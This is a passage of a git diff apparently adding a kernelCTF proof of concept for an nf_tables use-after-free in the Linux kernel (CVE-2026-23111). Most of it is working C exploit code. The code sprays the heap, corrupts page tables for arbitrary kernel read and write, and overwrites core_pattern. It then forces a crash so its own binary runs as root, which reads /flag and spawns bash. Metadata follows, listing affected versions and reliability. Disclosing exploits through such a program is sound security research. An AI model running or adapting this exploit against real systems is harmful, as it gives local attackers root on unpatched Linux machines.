+ + flags = tmp[0] & 0xfff; + + for (i = 0; i < num_pages; ++i) { + tmp[i] = flags | p | 0x8000000000000000; + p += PG_SIZE; + } + + if (write(fd[1], tmp, PG_SIZE) != PG_SIZE) { + perror("aaw write"); + for(;;); + } + + flush_tlb(corrupted_addr, len); + memcpy(corrupted_addr + offset, virt_src, len); +} + +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", MFD_EXEC); + // send our binary to memfd for core_pattern payload + sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff); + // our binary now at file descriptor 666 + dup2(memfd, 666); + close(memfd); + sleep(1); + while (check_core() == 0){ + sleep(1); + } + DEBUG_PRINT("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +int main(int argc, char *argv[]) +{ + uint32_t seq = 0; + int family = NFPROTO_IPV4; + const char *table = "poc_table"; + const char *bchain = "base_chain"; + const char *tchain = "target_chain"; + const char *mapname = "vmap"; + uint32_t mapid = 100; + int ret; + + int defrag_msg_arr[DEFRAG_MSG_SPARY_SZ]; + int defrag_sock_arr[DEFRAG_SOCK_SPARY_SZ]; + + int cc_msg_arr1[CC_MSG_SPARY_SZ]; + int cc_msg_arr2[CC_MSG_SPARY_SZ]; + + int server_sock_arr[RECLAIM_SOCK_SPARY_SZ]; + int client_sock_arr[RECLAIM_SOCK_SPARY_SZ]; + int reclaim_sock_arr[RECLAIM_SOCK_SPARY_SZ]; + int pipe_arr[PIPE_SPARY_SZ][2]; + + char msg_msg_buf[PG_SIZE], pipe_buf[PG_SIZE], tmp_buf[PG_SIZE]; + int a; + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + setvbuf(stderr, 0, 2, 0); + + if(argc > 2){ + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + + system("cat /flag"); + + execlp("bash", "bash", NULL); + } + + /* ── kernelXDK target detection ── */ + TargetDb kxdb("target_db.kxdb", target_db); + + Target st("kernelctf", "cos-121-18867.294.100"); + st.AddStruct("unix_address", 8, {}); + st.AddSymbol("core_pattern", 0x3fb3440); + kxdb.AddTarget(st); + + auto target = kxdb.AutoDetectTarget(); + DEBUG_PRINT("[+] Running on target: %s %s\n", + target.GetDistro().c_str(), + target.GetReleaseName().c_str()); + + auto msg_msg_hdr_size = target.GetStructSize("msg_msg"); + auto unix_address_size = target.GetStructSize("unix_address"); + auto core_pattern_offset = target.GetSymbolOffset("core_pattern"); + + unshare_setup(getuid(), getgid()); + ulimit_fd(); + set_cpu_affinity(0, 0); + + nl = mnl_socket_open(NETLINK_NETFILTER); + if (!nl) err(1, "mnl_socket_open"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + err(1, "mnl_socket_bind"); + portid = mnl_socket_get_portid(nl); + + int fd = mnl_socket_get_fd(nl); + struct timeval tv = { .tv_sec = 1, .tv_usec = 0 }; + setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + + /* ── Cleanup ── */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + del_table(b, &seq, family, table); + batch_end(b, &seq); + send_batch_and_recv(b); + } + + /* ══ Phase 0: Inits ══ */ + + init_msgq(defrag_msg_arr, DEFRAG_MSG_SPARY_SZ); + init_unix_sock(defrag_sock_arr, DEFRAG_SOCK_SPARY_SZ); + + init_msgq(cc_msg_arr1, CC_MSG_SPARY_SZ); + init_msgq(cc_msg_arr2, CC_MSG_SPARY_SZ); + init_unix_sock(server_sock_arr, RECLAIM_SOCK_SPARY_SZ); + init_unix_sock(client_sock_arr, RECLAIM_SOCK_SPARY_SZ); + init_unix_sock(reclaim_sock_arr, RECLAIM_SOCK_SPARY_SZ); + + for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (pipe2(pipe_arr[i], O_NONBLOCK) < 0) { + perror("init pipe"); + for(;;); + } + } + + memset(msg_msg_buf, 0, sizeof(msg_msg_buf)); + memset(pipe_buf, 0, sizeof(pipe_buf)); + memset(tmp_buf, 0, sizeof(tmp_buf)); + + + /* ══ Phase 1: Setup ══ */ + DEBUG_PRINT("[*] Phase 1: Creating table, chains, verdict map + catchall...\n"); + + /* Phase 1a: table + base chain + set*/ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + add_table(b, &seq, family, table); + add_chain(b, &seq, family, table, bchain, true); + add_verdict_map(b, &seq, family, table, mapname, mapid); + batch_end(b, &seq); + ret = send_batch_and_recv(b); + if (ret < 0) { + fprintf(stderr, "[-] Phase 1a failed: %d (%s)\n", ret, strerror(-ret)); + for(;;); + } + DEBUG_PRINT("[+] Phase 1a: table, base chains, verdict map created.\n"); + } + + /* Phase 1b - 1d: spray msg_msg and chain */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + add_chain(b, &seq, family, table, tchain, false); + batch_end(b, &seq); + + memset(msg_msg_buf, 0, 0x1000); + + + sched_yield(); + spray_msgsnd(cc_msg_arr1, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_hdr_size, msg_msg_buf, 1, 2); + ret = send_batch_and_recv(b); + spray_msgsnd(cc_msg_arr2, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_hdr_size, msg_msg_buf, 1, 2); + if (ret < 0) { + fprintf(stderr, "[-] Phase 1c failed: %d (%s)\n", ret, strerror(-ret)); + for(;;); + } + + DEBUG_PRINT("[+] Phase 1b-d: victim chains created.\n"); + } + + /* Phase 1e: add catchall element with raw NLA (bypass libnftnl verdict API) */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + add_catchall_elem_raw(b, &seq, family, table, mapname, mapid, tchain); + batch_end(b, &seq); + ret = send_batch_and_recv(b); + if (ret < 0) { + fprintf(stderr, "[-] Phase 1b (catchall element) failed: %d (%s)\n", + ret, strerror(-ret)); + fprintf(stderr, " This may mean the kernel does not support " + "NFT_SET_ELEM_CATCHALL (requires >= 5.13)\n"); + for(;;); + } + DEBUG_PRINT("[+] Phase 1e: catchall element (goto %s) added.\n", tchain); + } + + DEBUG_PRINT("[+] Phase 1 done.\n\n"); + + /* ══ Phase 2: Abort and Reclaim ══ */ + + DEBUG_PRINT("[*] Phase 2: DELSET(vmap) + NEWRULE(fail) → abort\n"); + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + trigger_abort(b, &seq, family, table, mapname); + batch_end(b, &seq); + ret = send_batch_and_recv(b); + if (ret != -2) { + perror("unexpected error on abort"); + for(;;); + } + } + + DEBUG_PRINT("[*] defrag socket\n"); + struct sockaddr_un un_addr; + size_t addr_len = 0x10 - unix_address_size; + memset(&un_addr, 0, sizeof(struct sockaddr_un)); + un_addr.sun_family = AF_UNIX; + un_addr.sun_path[0] = '\0'; + + DEBUG_PRINT("[*] now free and reclaim\n"); + /* Probe: try DELCHAIN to check if chain->use == 0 */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + del_chain(b, &seq, family, table, tchain); + batch_end(b, &seq); + + sched_yield(); + for(int i = 0; i < DEFRAG_SOCK_SPARY_SZ; i++){ + *(size_t *)(&un_addr.sun_path[1]) = i + 1; + if (bind(defrag_sock_arr[i], (struct sockaddr *)&un_addr, addr_len) < 0) { + perror("defrag bind"); + for(;;); + } + } + + release_msg(cc_msg_arr1, CC_MSG_SPARY_SZ); + release_msg(cc_msg_arr2, CC_MSG_SPARY_SZ); + ret = send_batch_and_recv(b); + usleep(100); + + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++){ + *(size_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; + if (bind(server_sock_arr[i], (struct sockaddr *)&un_addr, addr_len) < 0) { + perror("reclaim bind"); + for(;;); + } + } + + if (ret == 0) { + DEBUG_PRINT("[!] DELCHAIN succeeded!\n"); + } + else{ + perror("error on delchain"); + for(;;); + } + } + + DEBUG_PRINT("[*] connect and check\n"); + int tmp_sock; + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++){ + if (listen(server_sock_arr[i], 2) < 0){ + perror("reclaim listen"); + for(;;); + } + + *(uintptr_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; + ret = connect(client_sock_arr[i], (struct sockaddr*)&un_addr, addr_len); + if (ret < 0 && errno != EINPROGRESS){ + perror("reclaim connect"); + for(;;); + } + + if ((tmp_sock = accept(server_sock_arr[i], NULL, NULL)) < 0){ + perror("accept"); + for(;;); + } + close(tmp_sock); + } + + /* Cleanup */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + del_table(b, &seq, family, table); + batch_end(b, &seq); + send_batch_and_recv(b); + } + usleep(100); + + int * curr = (int *)pipe_buf; + for(int i = 0; i < sizeof(pipe_buf) / sizeof(int); i++){ + curr[i] = 1; + } + + DEBUG_PRINT("probing\n"); + struct sockaddr_un uaf_addr; + socklen_t uaf_addr_len = sizeof(uaf_addr); + int uaf_idx = -1; + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++){ + if(uaf_idx > 0){ + close(client_sock_arr[i]); + continue; + } + + sched_yield(); + close(client_sock_arr[i]); + if (getsockname(server_sock_arr[i], (struct sockaddr *)&uaf_addr, &uaf_addr_len) < 0) { + perror("probe getsockname"); + for(;;); + } + + ret = *(uintptr_t *)(&uaf_addr.sun_path[1]); + if(ret - UNIX_MAGIC_ADDR != i + 1){ + DEBUG_PRINT("%d uaf! 0x%x\n", i, ret); + uaf_idx = i; + } + } + + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) + if(i != uaf_idx) close(server_sock_arr[i]); + + for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (write(pipe_arr[i][1], pipe_buf, PG_SIZE) != PG_SIZE){ + perror("deref write"); + for(;;); + } + } + + void * addr; + if ((addr = mmap((void *)MMAP_ADDR, MMAP_SZ, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, -1, 0)) == MAP_FAILED){ + perror("mmap"); + for(;;); + } + madvise((void *)MMAP_ADDR, MMAP_SZ, MADV_NOHUGEPAGE); + + DEBUG_PRINT("[*] Spraying page tables...\n"); + + sched_yield(); + close(server_sock_arr[uaf_idx]); + uintptr_t pte; + int pt_idx; + for (int i = 0; i < PT_SPRAY_SZ; i++) { + *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i) = i + 1; + } + + for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (read(pipe_arr[i][0], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("deref read"); + for(;;); + } + + if(*((int *)tmp_buf) != 0x1){ + pte = *((uintptr_t *)tmp_buf); + DEBUG_PRINT("pte found! : 0x%lx\n", pte); + pt_idx = i; + //hex_dump(tmp_buf, 0x20); + *((uintptr_t *)tmp_buf) = pte - 0x4000; + + if (write(pipe_arr[i][1], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("deref write 2"); + for(;;); + } + + flush_tlb(MMAP_ADDR, MMAP_SZ); + break; + } + } + + uintptr_t pt_addr; + for (int i = 0; i < PT_SPRAY_SZ; i++) { + ret = *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i); + if(ret != i + 1){ + DEBUG_PRINT("corrupt va found: %d has %d\n",i, ret); + pt_addr = (uintptr_t)addr + MMAP_GAP * i; + break; + } + } + + + DEBUG_PRINT("user va %p\n", (void *)pt_addr); + int cnt = 0; + while(1){ + DEBUG_PRINT("slide %d\n", cnt); + + memset(tmp_buf, 0, sizeof(tmp_buf)); + aar(pipe_arr[pt_idx], tmp_buf, (void *)(core_pattern_offset + cnt * 0x1000000), pt_addr, PG_SIZE); + char * core_pattern_addr = (char *)(pt_addr + (core_pattern_offset & 0xfff)); + if(!strcmp(core_pattern_addr, "core")){ + DEBUG_PRINT("core_pattern found!\n"); + strcpy(core_pattern_addr, "|/proc/%P/fd/666 %P %P"); + + if (read(pipe_arr[pt_idx][0], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("post read"); + for(;;); + } + + *((uintptr_t *)tmp_buf) = 0; + + if (write(pipe_arr[pt_idx][1], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("post write"); + for(;;); + } + flush_tlb(MMAP_ADDR, MMAP_SZ); + break; + } + + + // munmap(MMAP_ADDR, MMAP_SZ); + + cnt ++; + } + + + if (fork() == 0) + { + set_cpu_affinity(1, 0); + setsid(); + crash(""); + for(;;); + } + + // //mnl_socket_close(nl); + // return 0; + + +out: + DEBUG_PRINT("done wait for shell...\n"); + for(;;); +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23111_cos/metadata.json new file mode 100644 index 000000000..a6d144510 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids":[ + "exp446" + ], + "vulnerability":{ + "patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f41c5d151078c5348271ffaf8e7410d96f2d82f8", + "cve":"CVE-2026-23111", + "affected_versions":[ + "5.0-rc1 - 6.15.2" + ], + "requirements":{ + "attack_surface":[ + "userns" + ], + "capabilities":[ + "CAP_NET_ADMIN" + ], + "kernel_config":[ + "CONFIG_NETFILTER", "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "cos-121-18867.294.100": { + "uses":[ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes":"6 ~ 7 times (exclude post-exploitation) or 2~3 times (include post-exploitation) success per 10 times run" + } + } +} + diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23111_cos/original.tar.gz new file mode 100644 index 000000000..84d565ce3 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23111_cos/original.tar.gz differ